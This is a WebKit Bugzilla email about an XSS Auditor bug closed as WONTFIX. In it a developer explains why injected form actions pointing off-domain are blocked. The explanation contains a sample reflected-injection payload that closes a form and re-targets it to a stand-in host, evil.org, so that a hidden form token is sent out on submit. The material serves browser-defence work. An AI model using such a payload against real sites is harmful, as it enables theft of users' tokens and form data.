[Webkit-unassigned] [Bug 72585] XSS Auditor : <form> action is blocked even if it is not a JavaScript URL

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Mon Feb 27 10:36:22 PST 2012


Thomas Sepez <tsepez at chromium.org> changed:

           What    |Removed                     |Added
             Status|NEW                         |RESOLVED
         Resolution|                            |WONTFIX

--- Comment #3 from Thomas Sepez <tsepez at chromium.org>  2012-02-27 10:36:21 PST ---
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam sugests in Comment #1).   Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when page contains:

<form action="http://good.com">
  <input type="text" name="quantity" value="2">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">

and the "quantity" input element contains an injection, and we reflect from the URL say

   ...?quantity="></form><form action="http://evil.org">

resulting in page:

<form action="http://good.com">
  <input type="text" name="quantity" value=""></form><form action="http://evil.org">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">

So when the user hits submit, we steal his formkey token (or other information from input fields).

Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.

Thanks heaps.

Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list